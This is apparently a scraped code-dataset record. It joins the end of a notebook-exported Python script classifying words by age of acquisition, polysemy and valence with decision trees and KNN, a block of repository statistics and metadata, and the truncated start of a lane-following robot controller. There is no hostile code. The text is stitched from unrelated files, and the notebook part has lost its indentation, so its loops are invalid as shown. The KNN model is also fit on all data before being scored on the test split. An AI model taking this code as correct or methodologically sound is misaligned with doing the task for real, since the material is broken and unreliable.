train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
yerr='std',
marker='o',
linestyle='-')
alpha_results[(alpha_results['alpha']>0.002)
&
(alpha_results['alpha']<0.004)]
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['young','old'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["young","old"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Polysemy"""
refvar="polysemy"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
yerr='std',
marker='o',
linestyle='-')
alpha_results[(alpha_results['alpha']>0.002)
]
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not polysemic','polysemic'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not polysemic","polysemic"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Valence"""
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
yerr='std',
marker='o',
linestyle='-')
alpha_results[(alpha_results['alpha']>0.0025)
&
(alpha_results['alpha']<0.0035)]
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['not valuable','valuable'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["not valuable","valuable"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average=None))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""# Multisplit target"""
df_class_ref = dfprepro.copy()
dataframe = [df_class_ref]
for dataset in dataframe:
dataset.loc[(dataset["aoa"] > 1) & (dataset["aoa"] <= 2), "aoa"] = 1
dataset.loc[(dataset["aoa"] > 2)& (dataset["aoa"] <= 3), "aoa"] = 2
dataset.loc[(dataset["aoa"] > 3)& (dataset["aoa"] <= 4), "aoa"] = 3
dataset.loc[(dataset["aoa"] > 4)& (dataset["aoa"] <= 5), "aoa"] = 4
dataset.loc[(dataset["aoa"] > 5)& (dataset["aoa"] <= 6), "aoa"] = 5
dataset.loc[(dataset["aoa"] > 6)&( dataset["aoa"] <= 7), "aoa"] = 6
dataset.loc[(dataset["aoa"] > 7), "aoa"] = 7
df_class_ref.head()
var_to_scale=["arousal","valence","dominance","familiarity","semsize","masculinity","perceivability"]
features = df_class_ref[var_to_scale]
scaler = MinMaxScaler().fit(features.values)
features = scaler.transform(features.values)
df_class_ref[var_to_scale] = features
df_class_ref.head()
"""### Age of Aquisition (DT)"""
refvar="aoa"
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='--')
alpha_results[(alpha_results['alpha']>0.0015)
&
(alpha_results['alpha']<0.0022)]
ideal_ccp_alpha = 0.001858
ideal_ccp_alpha = float(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['0-2','2-4','4-6','6-8','8-10','10-12'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=['0-2','2-4','4-6','6-8','8-10','10-12'],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average=None))
print(classification_report(y_test, y_pred))
print(clf_dt_pruned.predict_proba(X_test))
report = classification_report(y_test, y_pred, output_dict=True)
export = pd.DataFrame(report).transpose()
print(export.to_latex())
plt.show()
"""### Age of Acquisition (KNN)
#### choice of k
"""
from sklearn.neighbors import KNeighborsClassifier
refvar="aoa"
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
clf_knn = KNeighborsClassifier(n_neighbors=14)
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
confusion_matrix(y_train, y_pred)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['0-2','2-4','4-6','6-8','8-10'])
y_score = clf_knn.predict_proba(X_test)
report = classification_report(y_test, y_pred, output_dict=True)
export = pd.DataFrame(report).transpose()
print(export.to_latex())
| 28.800226
| 159
| 0.723478
| 16,782
| 102,068
| 4.098677
| 0.027649
| 0.034601
| 0.020455
| 0.030181
| 0.940858
| 0.93292
| 0.928806
| 0.925012
| 0.922569
| 0.917335
| 0
| 0.020442
| 0.13347
| 102,068
| 3,544
| 160
| 28.800226
| 0.757262
| 0.043412
| 0
| 0.922545
| 1
| 0
| 0.088119
| 0.000713
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000461
| false
| 0
| 0.026279
| 0
| 0.02674
| 0.078377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db419cc536faa492920d3742901bc8588e6578fb
| 58,653
|
py
|
Python
|
submission/code/modular/decide.py
|
NNpanpan/CS4278-5478-Project-Materials
|
f577f8beba9b96d63c31802d16c286749a3f7918
|
[
"MIT"
] | null | null | null |
submission/code/modular/decide.py
|
NNpanpan/CS4278-5478-Project-Materials
|
f577f8beba9b96d63c31802d16c286749a3f7918
|
[
"MIT"
] | null | null | null |
submission/code/modular/decide.py
|
NNpanpan/CS4278-5478-Project-Materials
|
f577f8beba9b96d63c31802d16c286749a3f7918
|
[
"MIT"
] | null | null | null |
from modular.lane_detection.lane import inspect_box, detect_lane, has_red_bar, is_pit
from modular.sign_recognition.detect_stop_sign import stop_detect
import numpy as np
import os
import argparse
class Controller:
def __init__(self, has_pit=False, has_intersection=False, has_stop_sign=False):
self.turning = 0
self.remaining_steps_of_slow = 0
self.buffer = [] # Actions can be decided in advanced
self.turn_left_incoming = False
self.forwarding = False
self.alt = True
self.middle = False
self.intersection = has_intersection
self.stop_sign = has_stop_sign
self.seeing_stop = False
self.has_pit = has_pit
self.passing_intersection = False
self.locating_turns = 1
self.turn_right_incoming = False
self.turning_right = False
self.turn_right_prep = -1
self.turn_right_prep_angles = [0, -1, 0.5, 1]
def load_actions(self, actions):
for (speed, steer) in actions:
self.buffer.append([speed, steer])
self.buffer.reverse()
self.middle = True
def stop_speed(self, speed):
if self.remaining_steps_of_slow <= 0:
return speed
self.remaining_steps_of_slow -= 1
return 0.1
def detect_stop(self, obs):
has_stop = stop_detect(obs)
print("Stop detection: ", has_stop)
# not seeing stop sign on the way
# just set
if not self.seeing_stop:
self.seeing_stop = has_stop
# first time seeing the stop sign
if has_stop:
self.seeing_stop = True
self.remaining_steps_of_slow = 0
return
if self.seeing_stop == True:
# When the stop sign is just out of the way,
# slow down for 200 steps
self.seeing_stop = False
self.remaining_steps_of_slow = 200
def predict(self, rgb_array=None, raw_obs=None):
print("Status ",self.turn_left_incoming, self.turn_right_incoming, self.middle)
if rgb_array is None:
return [0, 0]
image = np.array(rgb_array)
if self.buffer != []:
action = self.buffer.pop()
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
return action
# For maps with pits
if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
self.buffer = [[0.1, 1.0]] * 62
self.middle = False
return [0.1, 1.0]
# For maps with stop signs
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
print("Slopes ", pos_slope_avg, neg_slope_avg)
if lines is []:
return [1.0, 1]
if pos_slope_avg is None:
psa = 0
else:
psa = pos_slope_avg
if neg_slope_avg is None:
nsa = 0
else:
nsa = neg_slope_avg
steerer = abs(nsa) - psa
if steerer < 0:
steerer = max(steerer, -1)
if steerer > 0:
steerer = min(steerer, 1)
# if nsa != 0 and psa != 0:
# steerer = abs(nsa) - psa
# else:
# steerer = 0
# Bot-left
yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)
# Bot-right
yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)
# Bottom stripe
yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)
print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
print("Whites ", white_b_l, white_b_s, white_b_r)
print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)
# Big assumption of intersection: Always have either left or forward
if self.passing_intersection:
if white_b_l > 0.01 and white_b_r > 0.01:
# approaching the sideway, have to turn left
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
buf_steps = [[0.1, 0]] * 10
self.remaining_steps_of_slow = 10
else:
fwd_steps = [[0.44, 0]] * 16
buf_steps = [[0.44, 0]] * 3
self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
self.passing_intersection = False
return self.buffer.pop()
# okay, can go forward
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
self.remaining_steps_of_slow = 0
else:
fwd_steps = [[0.44, 0]] * 16
self.buffer = fwd_steps
self.passing_intersection = False
return self.buffer.pop()
# Find lanes
if not self.middle:
# return [-self.stop_speed(0.44), 0]
# if self.intersection:
# if white_b_l < 0.001:
# if white_b_r < 0.001:
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# return self.buffer.pop()
# if white_b_l > 0.01:
# if white_b_r < 0.001:
# # stuck to the left side...
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 13
# return self.buffer.pop()
if yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r > 0.0001:
# consider the middle boy
if yellow_b_s > 0.001:
# oof
# if psa >= 1:
# self.buffer = [[]]
if psa > 0.25:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8 + [[-self.stop_speed(0.35), 0]]
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 10 + [[-self.stop_speed(0.35), 0]]
return self.buffer.pop()
# between 2 lanes alr
self.middle = True
if steerer > 0:
return [self.stop_speed(0.44), 1]
else:
return [self.stop_speed(0.44), -1]
elif yellow_b_l > 0.02 and white_b_l < 0.0001 and white_b_r <= 0.0001:
if psa > 0.5:
# between 2 lanes, a bit close to left lane
# self.middle = True
return [self.stop_speed(0.44), steerer]
else:
# slope too small
if yellow_b_s < 0.1:
return [0.1, 1]
elif psa < 0.1:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
return self.buffer.pop()
elif psa < 0.2:
# self.middle = True
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
return self.buffer.pop()
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 4
return self.buffer.pop()
# self.buffer = [[0.35, -1]] *20 + [[0.44, 0]] * 5
# return self.buffer.pop()
elif yellow_b_l > 0.02 and white_b_r > 0.02 and yellow_b_r > 0.02:
# definitely grass on the right
return [self.stop_speed(0.44), 1]
elif yellow_b_l <= 0.02:
if yellow_b_r > 0.02 and white_b_r > 0.02:
if white_b_l < 0.02:
# prolly the grass
# turn to the left to find out more
return [0.1, 1]
else:
# kinda freakish
# let's backdown
return [-self.stop_speed(0.44), 0]
if white_b_l > 0.02 and white_b_r > 0.02:
# cheeky
# in front could be the grass
# but it could also be facing the edge
# false edges may be detected, so let's back down a bit
return [-self.stop_speed(0.44), 0]
if white_b_r > 0.02:
return [self.stop_speed(0.44), 1]
if white_b_l > 0.02 and yellow_b_r > 0.02:
# oh boy, we're reverse
# let's turn around madly
# welp, based on the slopes!
if pos_slope_avg is not None and pos_slope_avg < 0.6:
# positive slope is quite low
# let's back down once for safety and turn right
self.buffer = [[0.1, -1]] * 20 + [[-self.stop_speed(0.44), 0]]
return [-self.stop_speed(0.44), 0]
# By default, just turn right madly, should be safe
self.buffer = [[0.1, -1]] * 19
return [0.1, -1]
if white_b_l > 0.02 and yellow_b_r <= 0.02:
# it's kinda hard to tell
# if there's a lot of white on the left, then it shouldn't be the yellow lane
# just turn right to identify where the yellow lane is
return [0.1, -1]
return [0.1, 1]
else: # plenty of yellow on the left
# If there's lots of white-gray on the left, it's the grass
# If not, highly likely that it's the yellow lane
# Anyhow, turn right to find more information
return [0.1, -1]
if self.intersection:
red_bar, red_bar_pos = has_red_bar(image)
if red_bar and red_bar_pos == 'top':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'mid':
self.turn_right_incoming = self.turn_left_incoming = False
return [self.stop_speed(0.44), steerer]
if red_bar and red_bar_pos == 'bot':
self.turn_right_incoming = self.turn_left_incoming = False
self.middle = False
self.passing_intersection = True
if self.remaining_steps_of_slow > 0:
self.buffer = [[0.1, 0]] * 50
return [0.1, 0]
else:
self.buffer = [[self.stop_speed(0.44), 0]] * 16
return [self.stop_speed(0.44), steerer]
# On track to turn left
if self.turn_left_incoming:
if yellow_b_l <= 0.02:
return [self.stop_speed(0.35), 1]
if (neg_slope_avg is not None and neg_slope_avg <= -0.6) \
or pos_slope_avg is not None:
# If we turn left, eventually the bot will find a high enuf slope on the right side
# or we see the positive slopes!
self.turn_left_incoming = False
# self.middle = False
return [self.stop_speed(0.44), 0]
# On track to turn right
# Only start to turn once you can't see the yellow lane
if self.turn_right_incoming:
if yellow_b_l < 0.02 and yellow_b_s < 0.1:
# something's wrong
self.turn_right_incoming = False
return [self.stop_speed(0.35), 1]
if yellow_b_s < 0.1 or white_b_r > 0.01:
# still seeing lots of yellow lane to pass thru
return [self.stop_speed(0.44), 0]
if psa > 0 and psa < 0.25:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
else:
self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 16
self.turn_right_incoming = False
# self.middle = False
return self.buffer.pop()
# if self.turning_right:
# if yellow_b_r < 0.01 and ((pos_slope_avg is not None and pos_slope_avg >= 0.65) \
# or neg_slope_avg is not None):
# # If we turn right, eventually the bot will find a high enuf slope on the right side
# # or we see the negative slopes!
# self.turn_right_incoming = self.turning_right = False
# self.turn_right_prep = -1
# # self.middle = False
# if yellow_b_s < 0.1 and abs(yellow_b_r - yellow_b_l) < 0.01:
# self.buffer = [[0.1, -1]] * 20
# return self.buffer.pop()
# if self.alt:
# self.alt = False
# # return [self.stop_speed(0.35), -1]
# return [0.35, -1]
# else:
# self.alt = True
# return [0.1, 0]
# if white_b_r > 0.01 or (yellow_b_l > 0.01 and yellow_b_r < 0.03):
# if self.turn_right_prep < 0:
# self.turn_right_prep = 3
# st = self.turn_right_prep_angles[self.turn_right_prep]
# self.turn_right_prep -= 1
# return [self.stop_speed(0.44), st]
# self.turning_right = True
# return [0.35, -1]
# if white_b_r <= 0.01:
# # A bit of hack here
# # Turning right is easy to 'die' so alternate btw turning and step slightly forward
# if yellow_b_l > 0.015 and yellow_b_r > 0.015 \
# and max_g_b_l >= max_g_b_r:
# # return [-0.35, -1]
# return [0.1, -1]
# # if max_g_b_r > 177:
# # return [self.stop_speed(0.44), 1]
# if self.alt:
# self.alt = False
# # return [self.stop_speed(0.35), -1]
# return [0.35, -1]
# else:
# self.alt = True
# return [0.1, 0]
# if (pos_slope_avg is not None and pos_slope_avg >= 0.65) \
# or neg_slope_avg is not None:
# # If we turn right, eventually the bot will find a high enuf slope on the right side
# # or we see the negative slopes!
# self.turn_right_incoming = False
# return [self.stop_speed(0.44), 0]
# Duckie the bot is in the middle of 2 lanes
# Duckie is not expecting any turns
# Expecting standard situations
if pos_slope_avg is not None and neg_slope_avg is not None:
if pos_slope_avg >= 0.65 and neg_slope_avg <= -0.6:
return [self.stop_speed(0.8), steerer]
if pos_slope_avg < 0.65 and neg_slope_avg <= -0.6 :
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if yellow_b_l < 0.02:
return [self.stop_speed(0.8), 1]
if white_b_r < 0.02:
return [self.stop_speed(0.8), -1]
return [self.stop_speed(0.8), 0]
if pos_slope_avg is not None:
if pos_slope_avg < 0.5 and neg_slope_avg is None:
# Found a right curve here
# Believe Duckie will turn right in the future
self.turn_right_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
if neg_slope_avg is not None:
if neg_slope_avg > -0.6:
# Found a left curve here
# Believe Duckie will turn left in the future
self.turn_left_incoming = True
if white_b_r > 0.02:
return [self.stop_speed(0.8), steerer]
else:
return [self.stop_speed(0.44), steerer]
return [self.stop_speed(0.44), steerer]
def predict3(self, rgb_array=None, raw_obs=None):
print("Status ",self.turn_left_incoming, self.turn_right_incoming, self.middle)
if rgb_array is None:
return [0, 0]
image = np.array(rgb_array)
if self.buffer != []:
action = self.buffer.pop()
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
return action
# For maps with pits
if self.has_pit and is_pit(rgb_array, 100, 200, 699, 399) > 0.9:
self.buffer = [[0.1, 1.0]] * 62
self.middle = False
return [0.1, 1.0]
# For maps with stop signs
if self.stop_sign and raw_obs is not None:
self.detect_stop(raw_obs)
lines, pos_slope_avg, neg_slope_avg = detect_lane(rgb_array=image)
print("Slopes ", pos_slope_avg, neg_slope_avg)
if lines is []:
return [1.0, 1]
if pos_slope_avg is None:
psa = 0
else:
psa = pos_slope_avg
if neg_slope_avg is None:
nsa = 0
else:
nsa = neg_slope_avg
steerer = abs(nsa) - psa
if steerer < 0:
steerer = max(steerer, -1)
if steerer > 0:
steerer = min(steerer, 1)
# if nsa != 0 and psa != 0:
# steerer = abs(nsa) - psa
# else:
# steerer = 0
# Bot-left
yellow_b_l, white_b_l, max_g_b_l = inspect_box(image, 0, 300, 399, 599)
# Bot-right
yellow_b_r, white_b_r, max_g_b_r = inspect_box(image, 400, 300, 799, 599)
# Bottom stripe
yellow_b_s, white_b_s, max_g_b_s = inspect_box(image, 200, 500, 599, 599)
print("Yellows ", yellow_b_l, yellow_b_s, yellow_b_r)
print("Whites ", white_b_l, white_b_s, white_b_r)
print("Max green vals ", max_g_b_l, max_g_b_s, max_g_b_r)
# Big assumption of intersection: Always have either left or forward
if self.passing_intersection:
if white_b_l > 0.01 and white_b_r > 0.01:
# approaching the sideway, have to turn left
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
buf_steps = [[0.1, 0]] * 10
self.remaining_steps_of_slow = 10
else:
fwd_steps = [[0.44, 0]] * 16
buf_steps = [[0.44, 0]] * 3
self.buffer = fwd_steps + [[0.1, 1]] * 30 + buf_steps
self.passing_intersection = False
return self.buffer.pop()
# okay, can go forward
if self.remaining_steps_of_slow > 0:
fwd_steps = [[0.1, 0]] * 50
self.remaining_steps_of_slow = 0
else:
fwd_steps = [[0.44, 0]] * 16
self.buffer = fwd_steps
self.passing_intersection = False
return self.buffer.pop()
# Find lanes
if not self.middle:
# return [-self.stop_speed(0.44), 0]
# if self.intersection:
# if white_b_l < 0.001:
# if white_b_r < 0.001:
# self.buffer = [[0.1, 0], [0.1, -1], [0.1, -1]] * 8
# return self.buffer.pop()
# if white_b_l > 0.01:
